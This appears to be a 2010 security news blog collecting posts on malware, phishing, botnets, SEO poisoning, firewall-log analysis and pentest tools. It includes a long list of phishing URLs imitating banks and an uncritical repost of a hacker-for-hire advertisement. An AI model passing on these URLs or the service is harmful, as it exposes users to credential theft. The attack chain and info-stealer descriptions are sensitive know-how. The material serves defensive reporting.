Vodafone Android Phone: Complete with Mariposa Malware

2010-03-09T20:15:00.001+05:30

Panda Security has a post up on one of their employees buying a brand new Android phone from Vodafone and discovering it was spreading Mariposa. It didn't infect the phone proper, but it did have autoexec.inf and autoexec.bat files designed to infect whatever Windows machine the phone was plugged into via USB cable. Unlike the Engergizer story from yesterday, this one is happening now. Standard USB defenses apply, don't automatically execute autoexec.bat/inf files from USB devices. This Microsoft KB article discusses how to disable the "Autoplay" functionality that leads to this problem.

This leads to the interesting question, why not just infect the phones? The technology is certainly there to write malware that is phone specific. We won't see mass infection of phones (or even better, a cell-phone botnet) likely until commerce is much more common on phones. Malware is driven by the desire of profit and once it becomes profitable, we'll see exploitation. The problem is, that these slimmed down devices make it difficult to configure in security. Only a few cell phone types even have the option of cell phone antivirus software. The clock is ticking on that threat.

http://research.pandasecurity.com/vodafone-distributes-mariposa/

SAHI – Web Automation & Application Security Testing Tool

2010-03-09T19:06:00.000+05:30

Sahi is an automation tool to test web applications. Sahi injects javascript into web pages using a proxy and the javascript helps automate web applications.

Sahi is a tester friendly tool. It abstracts out most difficulties that testers face while automating web applications. Some salient features include excellent recorder, platform and browser independence, no XPaths, no waits, multi-threaded playback, excellent Java interaction and inbuilt reporting.

Features

Browser and Operating System independent
Powerful recorder which works across browsers
Powerful Object Spy
Intuitive and simple APIs
Javascript based scripts for good programming control
Version Controllable text-based scripts
In-built reports
In-built multi-threaded or parallel playback of tests
Tests do not need the browser window to be in focus
Command line and ant support for integration into build processes
Supports external proxy, HTTPS, 401 & NTLM authentications
Supports browser popups and modal dialogs
Supports AJAX and highly dynamic web applications
Scripts very robust
Works on applications with random auto-generated ids
Very lightweight and scalable
Supports data-driven testing. Can connect to database, Excel or CSV file.
Ability to invoke any Java library from scripts

Limitations

Framesets/pages with frames/iframes loading pages from multiple domains is not supported. Sahi cannot handle pages which have other pages from different domains embedded in them using iframes or frames. So you cannot have a page from google.com having an iframe with a page from yahoo.com. Note that this is not the same as switching between domains, where you navigate from a google.com page to a yahoo.com page, which will work in Sahi.
File upload field will not be populated on browsers for javascript verification. File upload itself works fine

You can download SAHI here:
http://sahi.co.in/w/

Scam Alert - Cute (and malicious) - funny picture from Facebook friends

2010-03-09T11:27:00.000+05:30

Cute (but malicious)

There’s an angelically tinged infection doing the rounds at the moment that has more than a whiff of sulphur about it.

We can't say for definite, but it looks like the point of this little angel is to turn your PC into a file storage area for an IRC channel since it dumps you into #music IRC channels and makes sure you can accept various media files.

Our tale begins with an Email, claiming you have a “funny picture from Facebook friends” waiting for you at Oast(dot)com:

This is what the end-user will download onto their system – an executable claiming to be a .gif:

Should they run the file, two things will happen. The first is that a rather charming image will appear on their desktop (courtesy of a hidden file called “Out.exe” which is dropped into the User Account Temp folder) – all part of the general ruse to make them think that yes, they really have been sent a “funny picture”:

The second is a little more sinister – an entire hidden directory (called tmp0000729b, dropped into the Windows Temp folder) arrives unannounced, laying the groundwork for an IRC invasion:

Yes, anyone blessed with the “vision” of those little angels is now part of a collection of IRC drones. If the end-user should hover their mouse over the seemingly empty system tray, they’ll actually discover the mIRC Daemon running in a hidden state:

As is typical for an IRC related hijack, everything is hidden away to keep the end-user from suspecting anything is wrong. Hidden mIRC tools, and seemingly deserted IRC channels are the order of the day. Shall we open up the mIRC client and play a little game of “Now you see it, now you don’t” in reverse?

Taken at face value, the above screenshots shows the victim sitting in an empty IRC channel. However, a quick highlight and...

...there they are, sitting beneath a pair of Admins in a #Music room. You can set mIRC to accept and ignore certain types of files by default, and here the client is indeed set to disallow .exes, .dlls .bat and .scr files but allow normal files such as .wavs, .jpegs, .gifs and MP3s. The victim is placed into numerous #Music rooms like the one above on various IRC servers, so it’s a possibility the intention here is media sharing by way of compromised PCs.

Detections aren’t great at the moment (11/42 in VirusTotal)virustotal.com/analisis/9618c83546c16ae1dab70ca0d2e594c2dd41f622820d92e7bc9e22f2b3bc9f38-1267769547

We detect this as Trojan.Win32.Generic!BT, and as for the domain?

Browser Exploitation

2010-03-09T10:21:00.000+05:30

BeEF is a web browser exploitation framework. This tool will demonstrate the collecting of zombie browsers and browser vulnerabilities in real-time. It provides a command and control interface which facilitates the targeting of individual or groups of zombie browsers.

Main Features :
BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple process.
•Browser exploitation modules
•Keystroke logging
•Distributed Port Scanning
•Integration with Metasploit via XML-RPC
•Mozilla extension exploitation support
•Tor detection
•Browser functionality detection modules

http://www.youtube.com/watch?v=4igZvLqEOD4&feature=player_embedded

Professional Hacker Online-They Say Soooo

2010-03-08T21:33:00.000+05:30

They Say

"Hireshacker has been the most renowned password retrieval service for over 5 years. With an immaculate experience spanning over 5 years, and having helped over a dozen law agencies across the world, we attain the most transparent and effective solutions that cater to your needs. "

Online SUPPORT @ 24/7/365

We have experts available 24/7 to answer all queries. We are open 365 days.
Access Guaranteed
If the password changes within 72 hrs after we provide it to you, we will retrieve it again for half the price.

Transparent and; Fraud-free
We provide multiple proofs before payment. At no point are you liable to pay us unless you are totally convinced.

SEO poisoning on TV show

2010-03-08T14:35:00.000+05:30

A new SEO (Search Engine Optimization) poisoning attack doing the rounds in the last 6-8 hours. We have talked about this kind of attacks in the past, although they were mainly focused on other hot technological topics, major tragedies, or events. This time, the topic to get on top of the search engines result page is a TV reality show. Specifically, there is a TV show premiere in the US tonight called "Billy the Exterminator". The "wiki billy the exterminator" search term in Google (USE WITH CAUTION: http://www.google.com/search?q=wiki+billy+the+exterminator) shows the poisoning attack.

The compromised sites present the following URL format: /FILE.php?PARAM=billy%20the%20exterminator%20wiki, where FILE is most commonly a three letter file name, and PARAM is an input parameter (one or multiple characters). The affected sites are using a drive by attack, providing victims a fake AV warning message that drives them to download a piece of malware: "Warning! Your computer is vulnerable to malware attacks. We recommend you to check your system immediately. Press OK to start the process now.".

PDF Info Stealer PoC

2010-03-08T12:49:00.000+05:30

An info stealer is malware that steals credentials or files from its victims.

Info stealers don’t require admin rights to perform their task, and can be designed to evade or bypass AV, HIPS, DLP and other security software.

This PDF document exploits a known vulnerability, and executes shellcode to load a DLL (embedded inside the PDF document) from memory into memory. This way, nothing gets written to disk (except the PDF file). The DLL searches the My Documents folder of the currect user for a file called budget.xls, and uploads it to Pastebin.com.

PDF info stealer was succesful: file budget.xls was posted to Pastebin.com

Preventing an info stealer from operating is not easy. The Windows operating system is designed to give user processes unrestricted access to the user’s data. It’s only starting with the Windows Vista kernel and Windows Integrity Control that a process can be assigned a lower level than user data and be restricted from accessing it. Lowering the Integrity Level of Acrobat Reader will help us in this case, but if I exploit an Excel vulnerability (or just use macros, without exploiting a vulnerability), the integrity levels will not protect us.

Neither is preventing data egress easy. OK, you can decide to block Pastebin.com. But can you block all sites that can be posted to? Like Wikipedia? And if you can, do you block ICMP packets?

To protect confidential data, don’t let it be accessed by systems with Internet access. That’s not very practical, but it’s reliable. Or use strong encryption with strong passwords (not the default RC4 Excel encryption). The info stealer will have the extra difficulty to steal the password too.

http://blog.didierstevens.com/2010/03/08/pdf-info-stealer-poc/

Phishing database

2010-03-08T09:17:00.002+05:30

Financial & Banking Institutions

Canada Trusth (http://www.tdcanadatrust.com/)
http://www-tdcanadatrust-com.epage.ru/td-bank-index.html
Citigroup (http://www.citigroup.com)
http://www.alanmetauro.com/home/online.citibank.com/US/JPS/portal/Index.do.htm?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH
CUA - Credit Union Australia (http://www.cua.com.au)
http://www.colconkproducts.com/pub/your-account-is-locked-cua-com-au/
http://173-11-85-81-sfba.hfc.comcastbusiness.net/images/webbanker.cua.com.au/webbanker/CUA/
UniCredit Banca (http://www.unicreditbanca.it)
http://161.58.125.218/uc/index.html
Grupo Banca Carige (http://www.gruppocarige.it/ws/gruppo/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/banca_carige/index.html
Grupo Banca Popolare Di Bari
http://www.georgiakoreans.com/bbs/data/bpr/index.html
Banca Cesare Ponti (http://www.gruppocarige.it/grp/bponti/html/ita/index.htm)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/banca_cesare_ponti/index.html
Banca Del Monte Di Luccia (http://www.gruppocarige.it/ws/bmlucca/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/banca_del_monte_di_lucca/index.html
CRS - Cassa di Risparmio di Savona (http://www.gruppocarige.it/ws/carisa/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/cassa_di_risparmio_di_savona/index.html
Cassa di Risparmio di Carrara (http://www.gruppocarige.it/ws/crcarrara/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/cassa_di_risparmio_di_carrara/index.html
Poste Italiane (http://www.poste.it)
http://posteitalianeonlinebpolcarteprestafgfdf.pcriot.com/posteitaliane/bpol/cartepre/formslogin.aspx.php?TYPE=33554433&REALMOID=06-b5208d98-1e41-108b-b247-8392a717ff3e&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME
http://www.ynzal.com/catalog/images/bpol/bancoposta/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid
http://www.yelin.ru/wm/bancopostaonline.poste.it/bpol/CARTEPRE/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid
Santander (www.santander.com)
http://slarrauri.com/tusitioweb/demo/BentoBox/modules/Logon.html
ABSA (http://www.absa.co.za)
http://markostoreltd.com/account.log/index.php
HSBC (http://www.hsbc.com)
http://worldviba.org/hboard3/bbs/indexx/hsbc/1.php?jsessionid=CAM10:jsessionid=0000RcSVT4vYF7HNB8AsppR8HRo:11j71fovq?IDV_URL=hsbc.MyHSBC_pib
http://www.ss4net.com/flash/IBlogin.html
http://www.tricitypt.com/photos/pediatrics/hsbcsecure/IBlogin.html
http://in2pool.com/Sources/.x/IBlogin.html
http://erethizon.net/pomocne/hibernace/IBlogin.php
http://cs.kku.ac.kr/data/file/alumnus/hsbconline/HSBC/index.php
http://etechsol.pk/cp/IBlogin.html
http://www.fsk-squad.eu/stats/IBlogin.html
http://www.goldenstwarriors.com/boxes/IBlogin.html
http://singaporeluggagestorage.info/modules/foles/kmg/www.hsbc.co.uk/CAM10-jsessionid=000026MQ7KnXUxsKmiYKszFUkGJ12c58ti63.htm
In the domain singaporeluggagestorage.info climbed several packages of phishing through a shell. Besides HSBC phishing pack, found others to CIBS and ING Direct.

ING Direct (http://www.ing.com)

http://singaporeluggagestorage.info/modules/foles/mijn.ing.htm
Lloyds TSB (http://www.lloydstsb.com)
http://cjuckett.com/gallery/include/login/online.lloydstsb.co.uk/online.lloydstsb.co.uk/online.lloydstsb.co.uk/online.lloydstsb.co.uk/customer.ibc/
Wachovia (http://www.wachovia.com)
http://202.111.173.205/.../wachovia/AuthService.php?action=presentLogin&url=https://onlineservices.wachovia.com/NASApp/NavApp/Titanium?action=returnHome
Bank of America (http://www.bankofamerica.com)
http://210.116.103.118/~kardex/gnuboard4/bbs/Languages/
http://ahuarqalliance.com/~ahuarqal/Pringles/www.bankofamerica.com/bofa-update/bofa-update/bofa/
J.P.Morgan (http://www.jpmorgan.com)
http://martindlk.ie/pdf_files/10/c/ch.htm?customerid=&co_partnerId=2&siteid=0&ru=&PageName=login_run&pp=pass&pageType=708XeMWZllWXS3AlBX+VShqAhQRfhgTDrf&co_partnerId=2&siteid=0&ru=&pp=&pageType=708&MfcISAPICommand=ConfirmRegistration&708XeMWZllWXS3AlBXVShqAhQRfhgTDrfQRfhgTDrfA
egg (http://www.egg.com)
http://www.extv.co.kr/data/file/s_tag08/819,00.html
http://www.wrpt.us/fireworks/Egg-Login.htm
InterSwitch (http://www.interswitchng.com)
http://2009_securityupdate1.t35.com/Nigeria_interSwitch.htm
MoneyGram (http://www.moneygram.com)
http://121.11.253.235/.cgi-bin/mg/MoneyGram/eMoneyTransfer/
Discover (http://www.discovercard.com)
https://www.discovercard.com/cardmembersvcs/loginlogout/app/ac_main
VISA (http://www.visa.com)
http://intersecure.fr/security/verified/cards/unlock/ssl/Deutschland/

Oficla botnet with more than 200,000 zombies recruits

2010-03-08T08:20:00.000+05:30

In a recent investigation, we discovered a Oficla botnet, also known as Sasfis in nomenclature of some antivirus companies, with a significant amount of zombies recruited in 48 countries, demonstrating the connotation scale represents the same on stage crimeware.

The base command and control (C&C) of this botnet Oficla is maintained through crimeware myLoader (costing in the underground market is USD 700) and is in Russia, a country in which the largest number of computers infected with a total of 116.119, followed by Ukraine with 53.746.

The total number of zombies that are part of this botnet amounts to an alarming number of 210.619. This information can be verified through the following screen.

While the figure is alarming, the problem is much deeper and disturbing. That is, for a system to an active part of a botnet, means that previously was infected by malicious code (in this case, Oficla/Sasfis), which shows clearly the failure of the security mechanisms implemented to counter this threats.

Not only in terms of prevention of infection but also to detect, depending on the type of traffic TCP/IP and HTTP, the system is part of a botnet.

On the other hand, it's important to note that the recruitment of this botnet continues to rise with approximately 120 computers infected per hour.

A report with more details on the management framework and the power of the botnet recruitment Oficla/Sasfis can be downloaded from the papers section of Malware Intelligence.

DoD Endorses Certification for Hackers

2010-03-07T18:50:00.000+05:30

The U.S. Department of Defense (DoD) announces the official approval of the EC-Council Certified Ethical Hacker (CEH) certification program as a new baseline skills requirement for U.S.cyber defenders.

Specifically, the new Certified Ethical Hacker program is required for the DoD’s computer network defenders (CND’s), a specialized personnel classification within the DoD’s information assurance workforce.

The Certified Ethical Hacker requirement falls under the auspices of DoD Directive 8570 Information Assurance Workforce Improvement Program.

The current version (incorporating Change 2) was signed by Assistant Secretary of Defense, John G. Grimes and was officially instated on February 25, 2010.

Directive 8570 provides clear guidance to information assurance training, certification and workforce management across all components of the DoD…

http://information-security-resources.com/2010/03/04/dod-endorses-certification-for-hackers/

Automation in creating exploits

2010-03-06T09:54:00.000+05:30

The exploitation of vulnerability now represents one of the highest infection strategies used in the stage of crimeware and exploits while allowing exploit weaknesses aren’t a new concept, the fact is that more and more notorious actions.

In fact now continue to be exploited, especially through exploits pack, a large number of vulnerabilities that many have been settled more than two years ago.

However, when these vulnerabilities are of type 0-Day, the problem is power. Cases such as “Operation Aurora” which has recently been bandied about by exploiting a vulnerability in the type 0-Day Internet Explorer 6. Yes, you read that right … Internet Explorer 6 and currently is being used to spread malware mass but only through version 6, but also on the 7 and 8.

The vulnerability is identified as CVE-2010-0249, and as was the case with the vulnerability exploited by the worm conficker (MS08-067) where automated creation, has recently met a builder that automates the creation of the exploit for Internet Explorer in an extremely simple question that is common in such applications.

This application is Chinese and only lets you configure the web address from where you try to exploit the weakness in the browser. Then generates a file called IE.html containing the exploit code and the url used for the attack, which is obfuscated.

As condiments relevant subject, the exploit generated (embedded in the html) is detected by less than 40% of companies reporting according to antivirus virutotal. While the builder is detected, by far, at least 25%.

On the other hand, exploits automation generates a gap, revealing that many operations “disguised” as part of campaign of distraction after simple attacks,

What is your firewall log telling you - Part #2

2010-03-06T08:47:00.000+05:30

Following up on Mark Hofman's earlier post ("What is your firewall log telling you"), here's some tips on how a Unix command line can be used to cut a big firewall log file down to size for quick analysis.

In the installation that I use as an example here, the firewall sits between the internal network and the Internet, and only allows the internal proxy server to talk to the Internet. PC's on the internal network must surf over the proxy, and are barred from making direct connections through the firewall. This doesn't mean though that the PC's won't try -- a lot of malware, chat software, file sharing tools, etc are proxy-aware, but frequently also try a "direct" connection first. Looking at the direct connections that internal PCs attempt to make is a good way to find out what's happening on the network...

Let's assume we have a Checkpointish log format like this:

time=2010-03-02 23:59:57 action=drop orig=192.168.1.103 i/f_dir=inbound i/f_name=eth1c0 has_accounting=0 product=VPN-1 & FireWall-1 policy_name=INTERNET src=1.2.3.4 s_port=37586 dst=3.4.5.6 service=3384 proto=tcp rule=16 xlatesrc=8.9.10.11 xlatesport=57517 xlatedport=0 NAT_rulenum=4 NAT_addtnl_rulenum=internal

Let's further assume that we have already checked the connections that the firewall accepts, and that we now only want to look at traffic the firewall blocked. The easiest way to accomplish this is by suppressing all log lines that contain the string "action=accept", as follows

grep -v "action=accept"

Now is where things get interesting. To make sense of the huge volume of log lines, we have to somehow "boil them down" into the essentials. Piping a log line into a command like this

cut -d" " -f14-16

will just give us the fields 14-16 of each log line, with "space" used as separator (-delimiter). Your log line format might vary of course, so just count and adapt. In the above example, fields 14-16 amount to "dst=3.4.5.6 service=443 proto=tcp", so this gives us the destinations that our internal PCs attempt to talk to. Applying this "cut" command to the entire log still will give us the same number of lines as we had in the original log, but adding a command like

sort uniq -c sort -rn

combines and counts all identical entries (uniq -c), and then gives us those lines that have the highest counts (sort, -n: by number, -r : reverse order). The result on the firewall log that I used as example here was

36642 dst=194.186.121.68 service=80 proto=tcp
8616 dst=62.105.135.101 service=80 proto=tcp
2641 dst=192.168.0.1 service=657 proto=udp
[...]

Once at this stage, the next step is to find out what these destinations are, and which systems we have on the network that are trying to talk to them. In this example, a quick check of "whois" reveals that both the top two IP addresses are in Russia ... and the topmost address had 36642 connection attempts from our network in a single day. Hmmm.....

Extending our original "cut" command above into

cut -d " " -f12,14-16

now also includes the "source address" (field 12) into the output. If we now filter (grep) the output to only contain the first of the above russian IPs, the entire command line becomes

cat logfile.20100302 grep -v "action=accept" cut -d" " -f12,14-16 grep "194.186.121.68" sort uniq -c sort -rn

36424 src=192.168.140.108 dst=194.186.121.68 service=80 proto=tcp
218 src=192.168.143.19 dst=194.186.121.68 service=80 proto=tcp

which shows two clients on our internal network (192.168.x) that try to talk to this outside IP address.

Now, the next step is to isolate the process(es) on these two systems that initiate the connections. If the two clients run on Windows, the best bet here is to use "tcpview" from the SysInternals suite. Some patience is called for - since the connection gets dropped by our firewall, it will not be listed as an active (ESTABLISHED) connection. But watching tcpview should eventually show a process that tries to open an outbound connection ("SYN_SENT"). Once the process is known, the "What Does Your Firewall Log Tell You" portion of this investigation is over, and standard malware fighting procedures kick in. SysInternals "ProcessExplorer" is a good next step to learn more about the potentially malicious process.

What is your favorite way to quickly carve out interesting tidbits from huge firewall logs?

https://isc.sans.org/diary.html?storyid=8347#comment

What is your firewall telling you and what is TCP249? (Part1)

2010-03-06T08:42:00.000+05:30

As part of our operational processes there is typically a line item stating "Review Firewall Logs". This is a requirement in many different standards and most people will have it down as a task to do. However we all know that there are way more interesting things to do rather than looking at log files. Unless you have some nice tools, it is one task that soon sends junior mad.

In trying to save Junior's sanity and basically because I am one of those people that actually likes looking at logs (I know, I have no life) I was going through some firewall logs. They never disappoint. There are the usual port scans happening for various ports:

217.10.127.105 13845 aaa.bbb.ccc.0 22 TCP
217.10.127.105 13845 aaa.bbb.ccc.6 22 TCP
217.10.127.105 13845 aaa.bbb.ccc.21 22 TCP
217.10.127.105 13845 aaa.bbb.ccc.12 22 TCP
217.10.127.105 13845 aaa.bbb.ccc.20 22 TCP
217.10.127.105 13845 aaa.bbb.ccc.10 22 TCP
217.10.127.105 13845 aaa.bbb.ccc.41 22 TCP
...
The usual hits on ports 135/137/139/445/1433/1434/25 can be found in the log file and there are the at the moment plenty of hits on 3306 for MySQL. A more unusual port to be hit was UDP 7 and TCP 249. UDP 7 was associated with some checks from a University (http://isc.sans.org/diary.html?storyid=4660), but I have yet to confirm this is the case here. TCP249 however isn't that common and If you do have some captures of traffic to TCP 249 I'd be interested in seeing them. There were also a number of high ports being hit, after chasing these down, in this environment, they were associated with torrent and Skype traffic.

It is also interesting to check the outbound traffic. Having a look to see what is trying to leave the network can also be enlightening. Torrent traffic seems to be fairly prevalent in the the logs I'm looking at, alas all it highlighted is that we'll have to do a regular dump of the NAT table so we can correlate the info and tag the internal user that is being silly. The logs can show you which machines talk to the internet and for what reason. They teach you what is normal in your network, something not easily achieved by using automated tools. People are still better than machines at identifying "weird". If you have the capacity you should consider logging not just denied traffic, but also allowed traffic on the firewall. Many attacks will try and sneak through, if you log all traffic you may be able to identify it.

When junior starts to shake and make strange noises that indicate the removal of all sharp objects from the office is needed, take a walk through your logs and get a feel for the "street" as it were. I can guarantee you will learn something. It may be something as exciting as a new attack, or as mundane as finding out some of your processes aren't working or being followed. You could even discover that some of your expensive tools aren't quite telling you the whole truth. Every now and then, take out your command prompt, find the grep man page and go nuts.

http://isc.sans.org/diary.html?storyid=8293

The Samurai Web Testing Framework

2010-03-06T07:03:00.000+05:30

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

http://samurai.inguardians.com/

Why DRM Doesn’t Work

2010-03-05T20:56:00.000+05:30

THE GEEK CODE

2010-03-05T09:08:00.001+05:30

The Geek Code is basicly a (small) part of Internet history. When the author incarnation of the code back in '93, it was as a lark. Eventually, it evolved into the form you see online now and has remained virtually unchanged since that time.

The Code Looks Something As Below....

GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N+++ o+ K+++ w--- O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++ e++ h r-- y++**

This parody of the output created by the PGP program will attempt to universalize how you will see the Geek Code around the net. Your GEEK CODE BLOCK will look like the following:

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N+++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------

To Cerate A Code...
http://www.geekcode.com/geek.html

Tutorial: Real Life HTTP Client-side Exploitation Example

2010-03-04T21:27:00.000+05:30

Tutorial: Real Life HTTP Client-side Exploitation Example

This section illustrates an example of a real life attack conducted against an organization that resulted in loss of critical data for the organization.

In this attack, Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today: Exploitation of client-side software and pass-the-hash attacks against Windows machines.

Step 0: Attacker Places Content on Trusted Site
In Step 0, the attacker begins by placing content on a trusted third-party website, such as a social networking, blogging, photo sharing, or video sharing website, or any other web server that hosts content posted by public users. The attacker's content includes exploitation code for unpatched client-side software.

Step 1: Client-Side Exploitation
In Step 1, a user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, such as a media player (e.g., Real Player, Windows Media Player, iTunes, etc.), document display program (e.g., Acrobat Reader), or a component of an office suite (e.g., Microsoft Word, Excel, Powerpoint, etc.). Upon receiving the attacker's content from the site, the victim user's browser invokes the vulnerable client-side program passing it the attacker's exploit code. This exploit code allows the attacker to install or execute programs of the attacker's choosing on the victim machine, using the privileges of the user who ran the browser. The attack is partially mitigated because this victim user does not have administrator credentials on this system. Still, the attacker can run programs with those limited user privileges.

Step 2: Establish Reverse Shell Backdoor Using HTTPS
In Step 2, the attacker's exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access of the victim machine, communicating between this system and the attacker using outbound HTTPS access from victim to attacker. The backdoor traffic therefore appears to be regular encrypted outbound web traffic as far as the enterprise firewall and network is concerned.

Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot
In Step 3, the attacker uses shell access of the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited privilege user account to full system privileges on this machine. Although vendors frequently release patches to stop local privilege escalation attacks, many organizations do not deploy such patches quickly, because such enterprises tend to focus exclusively on patching remotely exploitable flaws. The attacker now dumps the password hashes for all accounts on this local machine, including a local administrator account on the system.

In Step 4, instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network, a fully patched client system on which this same victim user has full administrative privileges. Using NTLMv1 or NTLMv2, Windows machines authenticate network access for the Server Message Block (SMB) protocol based on user hashes and not the passwords themselves, allowing the attacker to get access to the file system or run programs on the fully patched system with local administrator privileges. Using these privileges, the attacker now dumps the password hashes for all local accounts on this fully patched Windows machine.

Step 5: Pass the Hash to Compromise Domain Controller
In Step 5, the attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller system, again using a pass-the-hash attack to gain shell access on the domain controller. Because the password for the local administrator account is identical to the password for a domain administrator account, the password hashes for the two accounts are identical. Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain.

Steps 6 and 7: Exfiltration
In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization. In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.

Ncrack – High Speed Network Authentication Cracking Tool

2010-03-04T20:58:00.000+05:30

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients.

Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.

Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more.

Ncrack was started as a “Google Summer of Code” Project in 2009. While it is already useful for some purposes, it is still unfinished, alpha quality software. It is released as a standalone tool, be sure to read the Ncrack man page to fully understand Ncrack usage.

Rootkit.TDSS - A malware

2010-03-04T20:54:00.000+05:30

Rootkit.TDSS, TDL3 or Alureon [Microsoft] is a malware designed to hide the existence of any process on the infected machine in order to perform malicious and dangerous actions. TDSS may also replace essential system executable files, which may then be used to hide processes and files installed by the attackers.

Rootkit.TDSS is installed without user's permission through the use of trojan viruses, whereas trojan virus can download and install additional malware, adware or even rogue anti-spyware applications. Rootkit.TDSS removal can be complicated, but it is essential.

SEO Poisoning Sites Use Flash for Redirection

2010-03-04T16:07:00.000+05:30

Description:
Another day, another news, and well... another SEO Poisoning stint.

Using PDF files in SEO poisoning is a bit recent, but not exactly fresh news. So we were thinking of just adding the malicious URLs to our Browsing Protection and creating detections for the corresponding files... Then, we saw something...

Ok, could be one time thing, so we checked the other sites:

And in the usual geeky fashion in the lab... we got excited.

When decompressed, the SWF contains this:

Since a lot of websites use SWF, most users have already installed Flash support in their browsers, thereby also enabling support for the malware behavior.

The SWF is of course the key to getting to:

It seems that the bad guys want the malicious URLs to be hidden inside the SWF. Perhaps it makes them sleep better at night thinking that their sites won't be discovered very soon.

Malicious URLs are now blocked via the Browsing Protection and malicious files are detected.

http://www.f-secure.com/weblog/archives/00001899.html

Google Gears for Attackers

2010-03-04T14:17:00.000+05:30

Google Gears is a free and open source project from Google that provides some powerful features to both web applications and site users. Browsers like Google Chrome and SRWare Iron come with Gears pre‐installed. Users of other browsers can install Google Gears on their systems to experience these features.
This paper describes multiple stealthy and remote attacks against users of Google Gears which could have impacts ranging from stealing the entire Gmail Inbox of the victim to setting permanent backdoors in popular sites like Gmail, MySpace, WordPress, Google Docs etc.
For a website to make use of Google Gears, the user should explicitly permit the site to make use of Gears. Once this is done the site can store data on the user’s hard disk, in the form of SQLite databases. The site can read, write and alter this database. Gears also lets the site to save and serve pages locally from the user’s system, in effect, creating a web server on the user’s system. All of Google Gears’ features are accessible using the Gears API from JavaScript.
If an attacker controls the DNS server or is able to inject his data in to the user’s HTTP traffic then an attacker can serve content for a site that has been permitted by the user to use Gears. When this happens the attacker can exploit the features provided by Google Gears to cause serious and long‐lasting damage to the victim.
In traditional attacks in this scenario, the attacker would get the credentials of the user directly if the login is on HTTP. If it is on HTTPS then the attacker could perform a SSL MITM which is noisy or could strip off the SSL layer which is stealthier. A smart user might detect these attacks so alternatively the attacker could let the authentication happen securely on HTTPS and capture the post authenticated cookie, since most sites switch back to HTTP after authentication. All of these attacks depend entirely on the user entering his credentials which takes the control away from the attacker.
The attacks described in this paper could result in long‐term compromise and do not require user interaction, the attack duration is typically a second or two and is virtually undetectable by the user. Gears is a new technology which creates possibilities for new types of attacks to be carried out against the user. This paper discusses in details the various attacks that can be performed using the Database and LocalServer modules of Google Gears.
Interestingly the local database and content caching features are also part of HTML5. Attacks of similar nature to the ones described in this paper does work on HTML5 as well. However, no popular site has been found to use these features of HTML5 yet, hence this paper only focuses on Google Gears.

http://andlabs.org/whitepapers/GoogleGears_for_Attackers.pdf

MITB (Man in the Browser) Protection Layers

2010-02-26T22:11:00.000+05:30

MITB (Man in the Browser) Protection Layers
MITB attacks currently being used by modern banking trojans like URLZone and Zeus/Zbot. Although most modern-day banks have in place various security measures like multi-factor authentication to prevent online theft, based on my last article, we can see that most of these techniques are not enough to prevent MITB attacks. These techniques are mostly there to make the credentials theft difficult, but not impossible.

Today I am going to describe some other techniques (just some random thoughts) that might be used to defend against common MITB attacks.

Disclaimer: Technique #2 as explained below may already be known in the security industry. It is not my intention to take any credit for inventing this technique if it is already known. Let's just critically analyze these techniques and do a cost and benefit analysis.

Before I start explaining these techniques, Let me ask you a question. What is the main reason these banking trojans exist? Simplest and most appropriate answer is 'they want to steal your money'. This means if we somehow make this money stealing impossible then the basic motivation to access your banking assets will go away.

